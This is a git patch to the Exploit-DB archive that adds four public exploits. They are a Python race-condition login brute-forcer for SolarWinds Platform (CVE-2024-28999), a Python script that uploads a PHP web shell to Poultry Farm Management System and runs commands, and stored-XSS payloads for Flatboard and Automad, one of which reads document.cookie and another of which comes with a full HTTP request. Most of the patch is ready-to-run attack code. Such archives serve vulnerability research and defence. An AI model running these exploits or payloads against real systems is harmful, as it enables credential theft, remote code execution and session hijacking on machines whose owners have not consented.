From 2680e71d4433bdb7c417f09feb816f32f7bf7781 Mon Sep 17 00:00:00 2001
From: Exploit-DB <gitlab@exploit-db.com>
Date: Thu, 27 Jun 2024 00:16:25 +0000
Subject: [PATCH] DB: 2024-06-27

5 changes to exploits/shellcodes/ghdb

SolarWinds Platform 2024.1 SR1 - Race Condition

Automad 2.0.0-alpha.4 - Stored Cross-Site Scripting (XSS)

Flatboard 3.2 - Stored Cross-Site Scripting (XSS) (Authenticated)

Poultry Farm Management System v1.0 - Remote Code Execution (RCE)
---
 exploits/multiple/webapps/52055.py | 77 ++++++++++++++++++++++++++
 exploits/php/webapps/52053.py      | 62 +++++++++++++++++++++
 exploits/php/webapps/52054.txt     | 11 ++++
 exploits/php/webapps/52056.txt     | 89 ++++++++++++++++++++++++++++++
 files_exploits.csv                 |  4 ++
 5 files changed, 243 insertions(+)
 create mode 100755 exploits/multiple/webapps/52055.py
 create mode 100755 exploits/php/webapps/52053.py
 create mode 100644 exploits/php/webapps/52054.txt
 create mode 100644 exploits/php/webapps/52056.txt

diff --git a/exploits/multiple/webapps/52055.py b/exploits/multiple/webapps/52055.py
new file mode 100755
index 000000000..dbeeff72a
--- /dev/null
+++ b/exploits/multiple/webapps/52055.py
@@ -0,0 +1,77 @@
+# Exploit Title: SolarWinds Platform 2024.1 SR1 - Race Condition
+# CVE: CVE-2024-28999
+# Affected Versions: SolarWinds Platform 2024.1 SR 1 and previous versions
+# Author: Elhussain Fathy, AKA 0xSphinx
+
+import requests
+import urllib3
+import asyncio
+import aiohttp
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED')
+
+# host = '192.168.1.1'
+# username = "admin"
+# file_path = "passwords.txt"
+
+host = input("Enter the host: ")
+username = input("Enter the username: ")
+file_path = input("Enter the passwords file path: ")
+exploited = 0
+
+url = f"https://{host}:443/Orion/Login.aspx?ReturnUrl=%2F"
+
+passwords = []
+with open(file_path, 'r') as file:
+    for line in file:
+        word = line.strip()
+        passwords.append(word)
+print(f"Number of tested passwords: {len(passwords)}")
+
+
+headers = {
+    'Host': host,
+}
+
+sessions = []
+
+for _ in range(len(passwords)):
+    response = requests.get(url, headers=headers, verify=False, stream=False)
+    cookies = response.headers.get('Set-Cookie', '')
+    session_id = cookies.split('ASP.NET_SessionId=')[1].split(';')[0]
+    sessions.append(session_id)
+
+
+
+
+async def send_request(session, username, password):
+    headers = {
+        'Host': host,
+        'Content-Type': 'application/x-www-form-urlencoded',
+        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
+        'Cookie': f'ASP.NET_SessionId={session}; TestCookieSupport=Supported; Orion_IsSessionExp=TRUE',
+    }
+
+    data = f'__EVENTTARGET=ctl00%24BodyContent%24LoginButton&__EVENTARGUMENT=&__VIEWSTATE=AEQKNijmHeR5jZhMrrXSjzPRqhTz%2BoTqkfNmc3EcMLtc%2FIjqS37FtvDMFn83yUTgHBJIlMRHwO0UVUVzwcg2cO%2B%2Fo2CEYGVzjB1Ume1UkrvCOFyR08HjFGUJOR4q9GX0fmhVTsvXxy7A2hH64m5FBZTL9dfXDZnQ1gUvFp%2BleWgLTRssEtTuAqQQxOLA3nQ6n9Yx%2FL4QDSnEfB3b%2FlSWw8Xruui0YR5kuN%2BjoOH%2BEC%2B4wfZ1%2BCwYOs%2BLmIMjrK9TDFNcWTUg6HHiAn%2By%2B5wWpsj7qiJG3%2F1uhWb8fFc8Mik%3D&__VIEWSTATEGENERATOR=01070692&ctl00%24BodyContent%24Username={username}&ctl00%24BodyContent%24Password={password}'
+
+    async with aiohttp.ClientSession() as session:
+        async with session.post(url, headers=headers, data=data, ssl=False, allow_redirects=False) as response:
+            if response.status == 302:
+                global exploited
+                exploited = 1
+                print(f"Exploited Successfully Username: {username}, Password: {password}")
+
+
+async def main():
+    tasks = []
+    for i in range(len(passwords)):
+        session = sessions[i]
+        password = passwords[i]
+        task = asyncio.create_task(send_request(session, username, password))
+        tasks.append(task)
+    await asyncio.gather(*tasks)
+
+asyncio.run(main())
+
+if(not exploited):
+    print("Exploitation Failed")
\ No newline at end of file
diff --git a/exploits/php/webapps/52053.py b/exploits/php/webapps/52053.py
new file mode 100755
index 000000000..1b1c349bf
--- /dev/null
+++ b/exploits/php/webapps/52053.py
@@ -0,0 +1,62 @@
+# Exploit Title: Poultry Farm Management System v1.0 - Remote Code Execution (RCE)
+# Date: 24-06-2024
+# CVE: N/A (Awaiting ID to be assigned)
+# Exploit Author: Jerry Thomas (w3bn00b3r)
+# Vendor Homepage: https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/Redcock-Farm.zip
+# Github - https://github.com/w3bn00b3r/Unauthenticated-Remote-Code-Execution-RCE---Poultry-Farm-Management-System-v1.0/
+# Category: Web Application
+# Version: 1.0
+# Tested on: Windows 10 | Xampp v3.3.0
+# Vulnerable endpoint: http://localhost/farm/product.php
+
+import requests
+from colorama import Fore, Style, init
+
+# Initialize colorama
+init(autoreset=True)
+
+def upload_backdoor(target):
+    upload_url = f"{target}/farm/product.php"
+    shell_url = f"{target}/farm/assets/img/productimages/web-backdoor.php"
+
+    # Prepare the payload
+    payload = {
+        'category': 'CHICKEN',
+        'product': 'rce',
+        'price': '100',
+        'save': ''
+    }
+
+    # PHP code to be uploaded
+    command = "hostname"
+    data = f"<?php system('{command}');?>"
+
+    # Prepare the file data
+    files = {
+        'productimage': ('web-backdoor.php', data, 'application/x-php')
+    }
+
+    try:
+        print("Sending POST request to:", upload_url)
+        response = requests.post(upload_url, files=files, data=payload,
+verify=False)
+
+        if response.status_code == 200:
+            print("\nResponse status code:", response.status_code)
+            print(f"Shell has been uploaded successfully: {shell_url}")
+
+            # Make a GET request to the shell URL to execute the command
+            shell_response = requests.get(shell_url, verify=False)
+            print("Command output:", Fore.GREEN +
+shell_response.text.strip())
+        else:
+            print(f"Failed to upload shell. Status code:
+{response.status_code}")
+            print("Response content:", response.text)
+    except requests.RequestException as e:
+        print(f"An error occurred: {e}")
+
+if __name__ == "__main__":
+    target = "http://localhost"  # Change this to your target
+    upload_backdoor(target)
\ No newline at end of file
diff --git a/exploits/php/webapps/52054.txt b/exploits/php/webapps/52054.txt
new file mode 100644
index 000000000..1ec4eb0c0
--- /dev/null
+++ b/exploits/php/webapps/52054.txt
@@ -0,0 +1,11 @@
+# Exploit Title: Flatboard 3.2 - Stored Cross-Site Scripting (XSS) (Authenticated)
+# Date: 2024-06-23
+# Exploit Author: tmrswrr
+# Category : Webapps
+# Vendor Homepage: https://flatboard.org/
+# Version: 3.2
+# PoC:
+
+1-Login admin panel , go to this url : https://127.0.0.1//Flatboard/index.php/forum
+2-Click Add Forum and write in  Information field your payload : "><img src=x onerrora=confirm() onerror=confirm(document.cookie)>
+3-Save it , you will be payload will be executed
\ No newline at end of file
diff --git a/exploits/php/webapps/52056.txt b/exploits/php/webapps/52056.txt
new file mode 100644
index 000000000..7ce58e607
--- /dev/null
+++ b/exploits/php/webapps/52056.txt
@@ -0,0 +1,89 @@
+# Exploit Title: Automad 2.0.0-alpha.4 - Stored Cross-Site Scripting (XSS)
+# Date: 20-06-2024
+# Exploit Author: Jerry Thomas (w3bn00b3r)
+# Vendor Homepage: https://automad.org
+# Software Link: https://github.com/marcantondahmen/automad
+# Category: Web Application [Flat File CMS]
+# Version: 2.0.0-alpha.4
+# Tested on: Docker version 26.1.4, build 5650f9b | Debian GNU/Linux 11
+(bullseye)
+
+# Description
+
+A persistent (stored) cross-site scripting (XSS) vulnerability has been
+identified in Automad 2.0.0-alpha.4. This vulnerability enables an attacker
+to inject malicious JavaScript code into the template body. The injected
+code is stored within the flat file CMS and is executed in the browser of
+any user visiting the forum. This can result in session hijacking, data
+theft, and other malicious activities.
+
+# Proof-of-Concept
+
+*Step-1:* Login as Admin & Navigate to the endpoint
+http://localhost/dashboard/home
+
+*Step-2:* There will be a default Welcome page. You will find an option to
+edit it.
+
+*Step-3:* Navigate to Content tab or
+http://localhost/dashboard/page?url=%2F&section=text & edit the block named
+***`Main`***
+
+*Step-4:* Enter the XSS Payload - <img src=x onerror=alert(1)>
+
+
+*Request:*
+
+POST /_api/page/data HTTP/1.1
+
+Host: localhost
+Content-Length: 1822
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
+Content-Type: multipart/form-data;
+boundary=----WebKitFormBoundaryzHmXQBdtZsTYQYCv
+Accept: */*
+Origin: http://localhost
+Referer: http://localhost/dashboard/page?url=%2F&section=text
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie:
+Automad-8c069df52082beee3c95ca17836fb8e2=d6ef49301b4eb159fbcb392e5137f6cb
+Connection: close
+
+------WebKitFormBoundaryzHmXQBdtZsTYQYCv
+Content-Disposition: form-data; name="__csrf__"
+
+49d68bc08cca715368404d03c6f45257b3c0514c7cdf695b3e23b0a4476a4ac1
+------WebKitFormBoundaryzHmXQBdtZsTYQYCv
+Content-Disposition: form-data; name="__json__"
+
+{"data":{"title":"Welcome","+hero":{"blocks":[{"id":"KodzL-KvSZcRyOjlQDYW9Md2rGNtOUph","type":"paragraph","data":{"text":"Testing
+for
+xss","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"bO_fxLKL1LLlgtKCSV_wp2sJQkXAsda8","type":"paragraph","data":{"text":"<h1>XSS
+identified by
+Jerry</h1>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"},"+main":{"blocks":[{"id":"lD9sUJki6gn463oRwjcY_ICq5oQPYZVP","type":"paragraph","data":{"text":"You
+have successfully installed Automad 2.<br><br><img src=x
+onerror=alert(1)><br>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"NR_n3XqFF94kfN0jka5XGbi_-TBEf9ot","type":"buttons","data":{"primaryText":"Visit
+Dashboard","primaryLink":"/dashboard","primaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingVertical":"0.5rem","paddingHorizontal":"1.5rem"},"primaryOpenInNewTab":false,"secondaryText":"","secondaryLink":"","secondaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingHorizontal":"1.5rem","paddingVertical":"0.5rem"},"secondaryOpenInNewTab":true,"justify":"start","gap":"1rem"},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"}},"theme_template":"project","dataFetchTime":"1718911139","url":"/"}
+------WebKitFormBoundaryzHmXQBdtZsTYQYCv--
+
+
+*Response:*
+
+HTTP/1.1 200 OK
+
+Server: nginx/1.24.0
+Date: Thu, 20 Jun 2024 19:17:35 GMT
+Content-Type: application/json; charset=utf-8
+Connection: close
+X-Powered-By: PHP/8.3.6
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Content-Length: 30`
+
+{"code":200,"time":1718911055}
+
+
+*Step-5:* XSS triggers when you go to homepage - http://localhost/
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index e40b05800..64d6415b7 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -12263,6 +12263,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48713,exploits/multiple/webapps/48713.txt,"Socket.io-file 2.0.31 - Arbitrary File Upload",2020-07-26,Cr0wTom,webapps,multiple,,2020-07-26,2020-07-26,0,,,,,,
 49986,exploits/multiple/webapps/49986.txt,"Solar-Log 500 2.8.2 - Incorrect Access Control",2021-06-11,Luca.Chiou,webapps,multiple,,2021-06-11,2021-06-11,0,,,,,,
 49987,exploits/multiple/webapps/49987.txt,"Solar-Log 500 2.8.2 - Unprotected Storage of Credentials",2021-06-11,Luca.Chiou,webapps,multiple,,2021-06-11,2021-06-11,0,,,,,,
+52055,exploits/multiple/webapps/52055.py,"SolarWinds Platform 2024.1 SR1 - Race Condition",2024-06-26,"Elhussain Fathy",webapps,multiple,,2024-06-26,2024-06-26,0,CVE-2024-28999,,,,,
 22852,exploits/multiple/webapps/22852.txt,"SonicWALL CDP 5040 6.x - Multiple Vulnerabilities",2012-11-20,Vulnerability-Lab,webapps,multiple,,2012-11-20,2012-11-20,0,OSVDB-87640;OSVDB-87639;OSVDB-87638,,,,,https://www.vulnerability-lab.com/get_content.php?id=549
 24204,exploits/multiple/webapps/24204.pl,"SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x - Remote Command Execution",2013-01-18,"Nikolas Sotiriu",webapps,multiple,,2013-01-18,2016-12-04,0,CVE-2013-1359;OSVDB-89347,,,,,
 24203,exploits/multiple/webapps/24203.txt,"SonicWALL GMS/Viewpoint/Analyzer - Authentication Bypass",2013-01-18,"Nikolas Sotiriu",webapps,multiple,,2013-01-18,2013-01-18,0,CVE-2013-1360;OSVDB-89346,,,,,
@@ -14462,6 +14463,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 30531,exploits/php/webapps/30531.txt,"AutoIndex PHP Script 2.2.1 - 'index.php' Cross-Site Scripting",2007-08-27,d3hydr8,webapps,php,,2007-08-27,2013-12-27,1,,,,,,https://www.securityfocus.com/bid/25448/info
 30754,exploits/php/webapps/30754.txt,"AutoIndex PHP Script 2.2.2 - 'PHP_SELF index.php' Cross-Site Scripting",2007-08-27,L4teral,webapps,php,,2007-08-27,2014-01-06,1,CVE-2007-5983;OSVDB-38664,,,,,https://www.securityfocus.com/bid/26411/info
 26208,exploits/php/webapps/26208.txt,"Autolinks 2.1 Pro - 'Al_initialize.php' Remote File Inclusion",2005-08-29,4Degrees,webapps,php,,2005-08-29,2013-06-14,1,CVE-2005-2782;OSVDB-19066,,,,,https://www.securityfocus.com/bid/14686/info
+52056,exploits/php/webapps/52056.txt,"Automad 2.0.0-alpha.4 - Stored Cross-Site Scripting (XSS)",2024-06-26,"Jerry Thomas",webapps,php,,2024-06-26,2024-06-26,0,,,,,,
 35645,exploits/php/webapps/35645.txt,"Automagick Tube Script 1.4.4 - 'module' Cross-Site Scripting",2011-04-20,Kurd-Team,webapps,php,,2011-04-20,2014-12-29,1,,,,,,https://www.securityfocus.com/bid/47519/info
 41302,exploits/php/webapps/41302.txt,"Automated Job Portal Script - SQL Injection",2017-02-10,"Ihsan Sencan",webapps,php,,2017-02-10,2017-02-10,0,,,,,,
 8904,exploits/php/webapps/8904.txt,"Automated link exchange portal 1.3 - Multiple Vulnerabilities",2009-06-08,TiGeR-Dz,webapps,php,,2009-06-07,,1,,,,,,
@@ -18618,6 +18620,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 31908,exploits/php/webapps/31908.txt,"Flat Calendar 1.1 - Multiple Administrative Scripts Authentication Bypass Vulnerabilities",2008-06-11,Crackers_Child,webapps,php,,2008-06-11,2014-02-26,1,CVE-2008-6736;OSVDB-51506,,,,,https://www.securityfocus.com/bid/29662/info
 3428,exploits/php/webapps/3428.txt,"Flat Chat 2.0 - 'include online.txt' Remote Code Execution",2007-03-07,Dj7xpl,webapps,php,,2007-03-06,,1,OSVDB-33890;CVE-2007-1394,,,,,
 4705,exploits/php/webapps/4705.txt,"Flat PHP Board 1.2 - Multiple Vulnerabilities",2007-12-09,KiNgOfThEwOrLd,webapps,php,,2007-12-08,,1,OSVDB-44118;CVE-2007-6399;OSVDB-43893;CVE-2007-6398;OSVDB-43892;CVE-2007-6397;OSVDB-43891;CVE-2007-6396;OSVDB-43890;OSVDB-43678;OSVDB-43675;CVE-2007-6395,,,,,
+52054,exploits/php/webapps/52054.txt,"Flatboard 3.2 - Stored Cross-Site Scripting (XSS) (Authenticated)",2024-06-26,tmrswrr,webapps,php,,2024-06-26,2024-06-26,0,,,,,,
 8549,exploits/php/webapps/8549.txt,"Flatchat 3.0 - 'pmscript.php' Local File Inclusion",2009-04-27,SirGod,webapps,php,,2009-04-26,,1,OSVDB-54111;CVE-2009-1486,,,,,
 1405,exploits/php/webapps/1405.pl,"FlatCMS 1.01 - 'file_editor.php' Remote Command Execution",2006-01-04,cijfer,webapps,php,,2006-01-03,,1,,,,,,
 50262,exploits/php/webapps/50262.py,"FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)",2021-09-06,"Mason Soroka-Gill",webapps,php,,2021-09-06,2021-09-06,0,CVE-2021-39608,,,,http://www.exploit-db.comflatCore-CMS-2.0.7.tar.gz,
@@ -28244,6 +28247,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 800,exploits/php/webapps/800.txt,"PostNuke PostWrap Module - Remote File Inclusion / Code Execution",2005-02-08,"ALBANIA SECURITY",webapps,php,,2005-02-07,2017-11-22,1,,,,,,
 8032,exploits/php/webapps/8032.txt,"Potato News 1.0.0 - Local File Inclusion",2009-02-10,x0r,webapps,php,,2009-02-09,2017-02-08,1,OSVDB-52258;CVE-2009-0722,,,,,
 33820,exploits/php/webapps/33820.txt,"PotatoNews 1.0.2 - 'nid' Multiple Local File Inclusions",2010-04-07,mat,webapps,php,,2010-04-07,2014-06-20,1,,,,,,https://www.securityfocus.com/bid/39276/info
+52053,exploits/php/webapps/52053.py,"Poultry Farm Management System v1.0 - Remote Code Execution (RCE)",2024-06-26,"Jerry Thomas",webapps,php,,2024-06-26,2024-06-26,0,,,,,,
 12671,exploits/php/webapps/12671.txt,"Powder Blue Design - SQL Injection",2010-05-20,cyberlog,webapps,php,,2010-05-19,,1,,,,,,
 10289,exploits/php/webapps/10289.txt,"Power BB 1.8.3 - Remote File Inclusions",2009-11-25,DigitALL,webapps,php,,2009-11-24,,1,,,,,,
 5549,exploits/php/webapps/5549.txt,"Power Editor 2.0 - Remote File Disclosure / Edit",2008-05-05,"Virangar Security",webapps,php,,2008-05-04,2016-12-02,1,OSVDB-45025;CVE-2008-2116;OSVDB-45024;CVE-2008-2115,,,,http://www.exploit-db.comeditor_20.zip,